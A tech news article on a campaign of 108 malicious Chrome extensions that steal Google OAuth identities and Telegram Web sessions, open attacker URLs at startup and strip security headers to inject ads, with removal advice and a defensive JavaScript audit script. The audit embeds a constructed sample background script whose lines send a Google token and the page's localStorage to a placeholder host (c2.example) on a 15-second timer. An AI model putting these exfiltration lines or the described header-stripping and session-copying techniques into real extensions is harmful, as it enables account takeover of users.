108 malicious Chrome extensions steal data and inject ads

By Craig Nash
Tech writer at All Things Geek. Covers artificial intelligence, semiconductors, and computing hardware.

A coordinated campaign of 108 malicious Chrome extensions has been discovered stealing Google account credentials, hijacking Telegram sessions, and injecting ads into every page users visit. Security researchers at Socket’s Threat Research Team uncovered the operation, which affects approximately 20,000 users who installed these extensions from the Chrome Web Store. All 108 extensions communicate with the same command-and-control infrastructure, suggesting a single operator running a sophisticated data harvesting operation.

Key Takeaways

  • 108 malicious Chrome extensions linked to same command-and-control server stealing user data from 20,000 installations
  • 54 extensions harvest Google account identity (email, name, picture) via OAuth2 token theft
  • 45 extensions contain universal backdoors that open arbitrary URLs on browser startup
  • Extensions strip security headers from YouTube and TikTok to inject gambling overlays and advertisements
  • Malicious code operates silently while extensions provide legitimate functionality as cover

How the malicious Chrome extensions operate

The malicious Chrome extensions employ a deceptive strategy: they provide real, working functionality to avoid detection while running hidden malicious code in the background. Gaming extensions actually work as games. Telegram sidebar clients function as advertised. Translation tools translate text. This dual-layer approach allows them to persist undetected for longer periods, accumulating stolen data while users believe they are using legitimate tools.

The technical attack chain is remarkably consistent across the campaign. In 54 of the extensions, the malicious code calls chrome.identity.getAuthToken to obtain a Google OAuth2 bearer token for the account signed into Chrome, using the identity permission and OAuth2 client declared in the manifest. The extension then presents that token to Google's userinfo endpoint and exfiltrates the returned email, name, profile picture and unique Google ID to the threat actor's server at mines.cloudapi.stream. Nothing a game or translation tool visibly does justifies a Google token, and any prompt Chrome shows is attributed to the apparently legitimate extension, so users have no meaningful opportunity to consent to where the data goes. The harvested identities can be used to target accounts with tailored phishing, to seed credential-stuffing lists, or simply sold on underground markets.

Another 45 extensions contain a universal backdoor: when the browser starts, the extension opens whatever URL the operator supplies. That lets the threat actor push victims to malicious sites, deliver additional malware or stage drive-by downloads without any user action, and because it fires on every startup the capability persists for as long as the extension remains installed.

Telegram session hijacking and data exfiltration

Perhaps the most dangerous capability in this campaign is the exfiltration of Telegram Web sessions, repeated every 15 seconds. When a user is logged into Telegram in the browser, the malicious extension copies the session material and sends it to the attacker's server. A session, unlike a password, is already authenticated: the attacker needs neither the password nor a way around two-factor authentication. The result is full account takeover, with the attacker able to read all messages, access media and impersonate the user to contacts.

The extensions accomplish this by reading the authorization data Telegram Web keeps in the browser. The web clients hold their session keys in browser storage (localStorage and IndexedDB) rather than re-authenticating on each visit, so an extension with access to web.telegram.org can copy that state on a timer and replay it from another browser. Because Telegram Web accepts those session identifiers as proof of login, stealing them is equivalent to stealing the credentials themselves, and the user sees no indication of compromise until the attacker acts. Logging the browser session out of Telegram invalidates the copied keys, which is why revoking sessions matters more than changing the password here.

Ad injection and security header stripping

A subset of the malicious Chrome extensions targets YouTube and TikTok users specifically by stripping security headers from those sites' responses before the page loads. Content Security Policy is what stops a page from loading scripts and frames from unapproved origins, and X-Frame-Options is what stops the page from being embedded; with those and the related cross-origin policy headers removed (which an extension can do with a declarativeNetRequest modifyHeaders rule or a webRequest listener on the response), the attacker's injected content loads unhindered. The injected content includes gambling overlays, fake advertisements and redirect links that earn the threat actor revenue or deliver additional malware.

Two extensions go further by injecting content scripts into every single page a user visits, not just YouTube and TikTok. This gives the attacker the ability to monitor all browsing activity, steal form data entered on any website, or redirect users to phishing pages. One extension even proxies all translation requests through the threat actor’s server, capturing the text being translated and potentially sensitive information users intended to keep private.
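The four capabilities described in this section (Google OAuth token access, the startup URL backdoor, header stripping, and content scripts on every page) each leave a recognisable fingerprint in an extension's manifest.json, its declarativeNetRequest rule file, or its background script. The audit below is an added example written for this article, not code from Socket's report or from the extensions themselves. The manifest, rules and background source it inspects are constructed to resemble the described behaviour, the host c2.example is a placeholder rather than the campaign's real server, and the regular-expression checks are heuristics that give a reviewer leads, not proof.

```javascript
// Added example for this article (not code from Socket's report or from the
// extensions): static checks for the capability patterns described above in an
// extension's manifest.json, its declarativeNetRequest rule file and its
// background script. The regexes are heuristics, and every input below is
// constructed; "c2.example" is a placeholder, not a real command-and-control host.

const EVERY_PAGE = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
// Response headers whose removal lets foreign scripts, frames and overlays load.
const PROTECTIVE_HEADERS = new Set([
  "content-security-policy",
  "x-frame-options",
  "cross-origin-opener-policy",
  "cross-origin-embedder-policy",
]);

function coversEveryPage(patterns) {
  return (patterns || []).some((p) => EVERY_PAGE.has(p));
}

// Manifest-level indicators: whose identity can the extension use, and where does it run?
function auditManifest(manifest) {
  const findings = [];
  const perms = new Set(manifest.permissions || []);
  if (perms.has("identity") && manifest.oauth2) findings.push("oauth-token-access");
  if (coversEveryPage(manifest.host_permissions)) findings.push("all-hosts");
  if ((manifest.content_scripts || []).some((cs) => coversEveryPage(cs.matches))) {
    findings.push("content-script-every-page");
  }
  if (perms.has("declarativeNetRequest") || perms.has("declarativeNetRequestWithHostAccess") || perms.has("webRequest")) {
    findings.push("can-rewrite-headers");
  }
  return findings;
}

// Rule-level indicator: modifyHeaders rules that delete protective response headers.
function auditRules(rules) {
  const findings = [];
  for (const rule of rules || []) {
    if (!rule.action || rule.action.type !== "modifyHeaders") continue;
    for (const h of rule.action.responseHeaders || []) {
      const name = String(h.header).toLowerCase();
      if (h.operation === "remove" && PROTECTIVE_HEADERS.has(name)) findings.push(`strips:${name}`);
    }
  }
  return findings;
}

// Source-level indicators in the background script (heuristic string matches).
function auditBackgroundSource(src) {
  const findings = [];
  if (/chrome\.identity\.getAuthToken/.test(src)) findings.push("calls-getAuthToken");
  // Startup listener that fetches something from the network and opens a tab with it.
  if (/runtime\.onStartup/.test(src) && /fetch\s*\(/.test(src) && /tabs\.create/.test(src)) {
    findings.push("startup-url-from-network");
  }
  // A fixed-interval timer that sends data out (the shape of the 15-second Telegram beacon).
  if (/setInterval\s*\(/.test(src) && /fetch\s*\(/.test(src)) findings.push("periodic-network-send");
  return findings;
}

function auditExtension({ manifest, rules, background }) {
  return [...auditManifest(manifest), ...auditRules(rules), ...auditBackgroundSource(background || "")];
}

// Constructed sample resembling the described campaign: a "game" that wants a Google
// token, runs on every page, and strips CSP / X-Frame-Options on youtube.com.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Lucky Keno (constructed sample)",
  permissions: ["identity", "declarativeNetRequest", "storage"],
  oauth2: { client_id: "placeholder.apps.googleusercontent.com", scopes: ["openid", "email", "profile"] },
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["inject.js"] }],
  background: { service_worker: "bg.js" },
};
const SAMPLE_RULES = [{
  id: 1, priority: 1,
  action: { type: "modifyHeaders", responseHeaders: [
    { header: "Content-Security-Policy", operation: "remove" },
    { header: "X-Frame-Options", operation: "remove" },
  ] },
  condition: { urlFilter: "||youtube.com", resourceTypes: ["main_frame"] },
}];
const SAMPLE_BACKGROUND = `
chrome.runtime.onStartup.addListener(async () => {
  const r = await fetch("https://c2.example/start");       // operator-supplied URL
  chrome.tabs.create({ url: await r.text() });
});
chrome.identity.getAuthToken({ interactive: true }, (t) => fetch("https://c2.example/id?t=" + t));
setInterval(() => fetch("https://c2.example/tg", { method: "POST", body: JSON.stringify(localStorage) }), 15000);
`;
// A legitimate Telegram sidebar client also matches web.telegram.org, so a host match alone is not a finding.
const BENIGN_MANIFEST = {
  manifest_version: 3,
  name: "Notes sidebar (constructed sample)",
  permissions: ["storage"],
  content_scripts: [{ matches: ["*://web.telegram.org/*"], js: ["sidebar.js"] }],
};

console.log(auditExtension({ manifest: SAMPLE_MANIFEST, rules: SAMPLE_RULES, background: SAMPLE_BACKGROUND }));
console.log(auditExtension({ manifest: BENIGN_MANIFEST, rules: [], background: "chrome.storage.local.get('notes');" }));
```

To use it on a real unpacked extension, feed it the manifest.json, the rule file named under declarative_net_request.rule_resources, and the background service worker source. An extension that trips the OAuth, every-page and header-stripping checks at once while presenting itself as a slot-machine game is exactly the profile this campaign fits; a Telegram sidebar client that only matches web.telegram.org is not, which is why the benign sample returns nothing.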

Published identities and Chrome Web Store presence

The 108 extensions were published under five publisher identities: Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt. Splitting the catalogue across multiple publisher accounts within the Chrome Web Store was likely intended to make the extensions appear to come from unrelated developers and to avoid being detected as a group. The shared command-and-control infrastructure and identical code patterns nonetheless revealed the coordinated nature of the operation.

At the time of discovery in April 2026, all 108 extensions were still live in the Chrome Web Store. Socket's researchers reported them to Google, but the extensions remained available for installation. They span multiple categories: gaming (slot machine simulators, Keno games), Telegram sidebar clients, YouTube and TikTok enhancers, text translation tools, page utilities and social media tools. This spread across categories helped the malicious extensions blend in with legitimate ones and avoid raising suspicion.

Malware-as-a-Service infrastructure

The campaign is described as operating on a Malware-as-a-Service (MaaS) model: rather than using the stolen data directly, the operator appears to sell access to Google identities, Telegram sessions and victim browsers (for ad or malware injection) to other criminals. That model would explain both the scale of the campaign and the investment in consistent, reusable collection code across 108 extensions.

How to identify and remove malicious Chrome extensions

Users can check their installed extensions by opening chrome://extensions in the address bar (or Menu > Extensions > Manage Extensions). Turn on Developer mode in the top-right corner so that each extension's 32-character ID is shown; Socket's report lists all 108 IDs and names, and the ID is the reliable thing to compare, since names and icons are easy for an operator to change or reuse. Review the list for unfamiliar extensions, especially gaming, translation or social media tools you do not remember installing, and check whether the publisher shown on the extension's Chrome Web Store listing is one of Yana Project, GameGen, SideGames, Rodeo Games or InterAlt.

If any suspicious extension is found, click Remove next to it on the Extensions page. Removal stops the extension but does not undo what it already sent. For Google, run the Security Checkup, review the Third-party apps & services page in your Google Account and revoke any access you do not recognise, sign out of unfamiliar sessions, and change the password. For Telegram, terminate all other sessions from Settings > Devices so the copied session data stops working. Change passwords on any site where you typed credentials while the extension was installed, enable two-factor authentication on those accounts if it is not already on, and watch for logins from unfamiliar locations.

Why these extensions bypassed Chrome’s security checks

The Chrome Web Store runs automated and manual review designed to catch malicious extensions before they are published. This campaign got through because each extension genuinely does what its listing says: a reviewer testing a slot machine or translator sees working functionality and has no surface-level reason to look for background code that mints OAuth tokens or rewrites response headers. Shipping real features as cover for malicious code is the classic trojanized-application pattern; it is not living off the land, a term that properly refers to abusing legitimate tools already present on a system.

Additionally, the extensions used obfuscation and encoding to hide the malicious code from automated scanners. The code contained Russian language comments, suggesting the developers are Russian-speaking, but this does not constitute a confirmed attribution to any specific threat actor or nation-state. The sophistication of the operation and the scale of the campaign suggest a well-resourced group with experience in evading security controls.

What should Chrome users do now?

Beyond removing the 108 known malicious extensions, users should adopt habits that reduce the chance of installing one in the future. Prefer publishers with a long track record and many users, but treat ratings and install counts as weak signals, since both can be seeded. The permissions an extension requests are a stronger signal: be sceptical of anything that wants access to all websites, to your identity, or to modify network requests when its stated purpose (a game, a notes tool) does not require it. Read the privacy policy before installing, and audit installed extensions regularly, removing any you no longer use.

Run Chrome's Safety check (chrome://settings/safetyCheck), which reviews installed extensions and flags ones that have been removed from the Chrome Web Store or identified as malware, and keep Safe Browsing enabled. If you suspect your Google account has been compromised, use the Google Account Security Checkup to review connected devices, recent activity and third-party access, and revoke anything you do not recognise. For Telegram users, terminate all other sessions from Settings > Devices; doing so invalidates any session data the extension copied.

FAQ

How do I know if I installed one of the malicious Chrome extensions?

Open chrome://extensions, enable Developer mode to reveal extension IDs, and compare them against the list of 108 IDs in Socket's report. The extensions were published under Yana Project, GameGen, SideGames, Rodeo Games or InterAlt. If you find a match, remove it immediately, then revoke the affected Google and Telegram sessions and change your passwords.

Can malicious Chrome extensions steal my passwords?

Not your saved passwords directly, but the effect is similar. These extensions obtain a Google OAuth2 token that identifies your account and copy Telegram's browser session data, which lets an attacker act as you without ever learning a password. The two extensions that inject into every page can also read what you type into forms, including login credentials entered on other websites.

Is Google fixing the Chrome Web Store to prevent this in the future?

The research brief does not contain information about Google’s response or planned improvements to Chrome Web Store security. However, users should expect Chrome’s review processes to evolve as threats become more sophisticated.

The discovery of 108 coordinated malicious extensions demonstrates that the Chrome Web Store remains a target for sophisticated threat actors. Users cannot rely solely on Chrome’s built-in security to protect them—regular audits of installed extensions and careful vetting of new extensions before installation are essential. If you use Chrome, review your extensions now. If you find any unfamiliar or suspicious extensions, delete them immediately and change your passwords for sensitive accounts.

Edited by the All Things Geek team.

Source: Tom's Guide
